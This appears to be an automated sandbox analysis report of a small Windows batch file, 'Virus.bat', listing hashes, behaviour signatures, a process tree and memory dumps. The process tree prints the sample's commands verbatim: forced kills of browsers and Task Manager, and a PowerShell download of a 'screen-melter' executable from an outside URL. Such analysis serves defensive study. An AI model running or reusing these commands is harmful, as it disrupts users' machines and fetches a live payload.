9745c4e2e22b15140e324dd59785803f72d04cb627cdc66fe3548c642576ec61

Analysis

max time kernel
121s
max time network
124s
platform
windows7_x64
resource
win7-20231020-en
resource tags

arch:x64arch:x86image:win7-20231020-enlocale:en-usos:windows7-x64system
submitted
21-10-2023 20:37

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Virus.bat
Size

568B
MD5

acecd257f02e34d3bf496ca958b43c8b
SHA1

652936e405caec5c43757db7dfe9b7e29b6cbd96
SHA256

9745c4e2e22b15140e324dd59785803f72d04cb627cdc66fe3548c642576ec61
SHA512

126a8ec4a659726083a028e075c8e7a0402ab6924b1333707d4a74c7629a18375e3cb727acf5023ebd095487c80732a128e890a9fa8debc6c551c23711bd28c7

Score

3^/10

Malware Config

Signatures

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Delays execution with timeout.exe 4 IoCs

evasion

pid	Process
2732	timeout.exe
2712	timeout.exe
1828	timeout.exe
3040	timeout.exe

Kills process with taskkill 4 IoCs

evasion

pid	Process
1676	taskkill.exe
2672	taskkill.exe
2188	taskkill.exe
2792	taskkill.exe

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
2440	powershell.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

description	pid	Process
Token: SeDebugPrivilege	1676	taskkill.exe
Token: SeDebugPrivilege	2672	taskkill.exe
Token: SeDebugPrivilege	2188	taskkill.exe
Token: SeDebugPrivilege	2792	taskkill.exe
Token: SeDebugPrivilege	2440	powershell.exe

Suspicious use of WriteProcessMemory 30 IoCs

description	pid	Process	procid_target
PID 2276 wrote to memory of 1676	2276	cmd.exe	29
PID 2276 wrote to memory of 1676	2276	cmd.exe	29
PID 2276 wrote to memory of 1676	2276	cmd.exe	29
PID 2276 wrote to memory of 2672	2276	cmd.exe	31
PID 2276 wrote to memory of 2672	2276	cmd.exe	31
PID 2276 wrote to memory of 2672	2276	cmd.exe	31
PID 2276 wrote to memory of 2188	2276	cmd.exe	32
PID 2276 wrote to memory of 2188	2276	cmd.exe	32
PID 2276 wrote to memory of 2188	2276	cmd.exe	32
PID 2276 wrote to memory of 2792	2276	cmd.exe	33
PID 2276 wrote to memory of 2792	2276	cmd.exe	33
PID 2276 wrote to memory of 2792	2276	cmd.exe	33
PID 2276 wrote to memory of 2732	2276	cmd.exe	34
PID 2276 wrote to memory of 2732	2276	cmd.exe	34
PID 2276 wrote to memory of 2732	2276	cmd.exe	34
PID 2276 wrote to memory of 2712	2276	cmd.exe	35
PID 2276 wrote to memory of 2712	2276	cmd.exe	35
PID 2276 wrote to memory of 2712	2276	cmd.exe	35
PID 2276 wrote to memory of 2644	2276	cmd.exe	36
PID 2276 wrote to memory of 2644	2276	cmd.exe	36
PID 2276 wrote to memory of 2644	2276	cmd.exe	36
PID 2276 wrote to memory of 1828	2276	cmd.exe	37
PID 2276 wrote to memory of 1828	2276	cmd.exe	37
PID 2276 wrote to memory of 1828	2276	cmd.exe	37
PID 2276 wrote to memory of 2440	2276	cmd.exe	38
PID 2276 wrote to memory of 2440	2276	cmd.exe	38
PID 2276 wrote to memory of 2440	2276	cmd.exe	38
PID 2276 wrote to memory of 3040	2276	cmd.exe	39
PID 2276 wrote to memory of 3040	2276	cmd.exe	39
PID 2276 wrote to memory of 3040	2276	cmd.exe	39

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\Virus.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:2276
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM "chrome.exe"
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1676
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM "firefox.exe"
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2672
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM "ProcessHacker.exe"
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2188
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM "taskmgr.exe"
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2792
- C:\Windows\system32\timeout.exe
  timeout 4
  2⤵
  - Delays execution with timeout.exe
  PID:2732
- C:\Windows\system32\timeout.exe
  timeout 2
  2⤵
  - Delays execution with timeout.exe
  PID:2712
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\test.vbs"
  2⤵
  PID:2644
- C:\Windows\system32\timeout.exe
  timeout 1
  2⤵
  - Delays execution with timeout.exe
  PID:1828
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell Invoke-WebRequest 'https://cdn.glitch.global/128934fb-376a-4833-a71b-7536475431ef/screen-melter.exe?v=1697919791762' -OutFile getscreenmelted.exe
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2440
- C:\Windows\system32\timeout.exe
  timeout 10
  2⤵
  - Delays execution with timeout.exe
  PID:3040

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/2440-38-0x000000001B290000-0x000000001B572000-memory.dmp

Filesize
2.9MB

Download
memory/2440-39-0x0000000002320000-0x0000000002328000-memory.dmp

Filesize
32KB

Download
memory/2440-40-0x000007FEF5C70000-0x000007FEF660D000-memory.dmp

Filesize
9.6MB

Download
memory/2440-41-0x00000000028A0000-0x0000000002920000-memory.dmp

Filesize
512KB

Download
memory/2440-42-0x00000000028A0000-0x0000000002920000-memory.dmp

Filesize
512KB

Download
memory/2440-43-0x00000000028A0000-0x0000000002920000-memory.dmp

Filesize
512KB

Download
memory/2440-44-0x000007FEF5C70000-0x000007FEF660D000-memory.dmp

Filesize
9.6MB

Download
memory/2440-45-0x00000000028A0000-0x0000000002920000-memory.dmp

Filesize
512KB

Download
memory/2440-46-0x000007FEF5C70000-0x000007FEF660D000-memory.dmp

Filesize
9.6MB

Download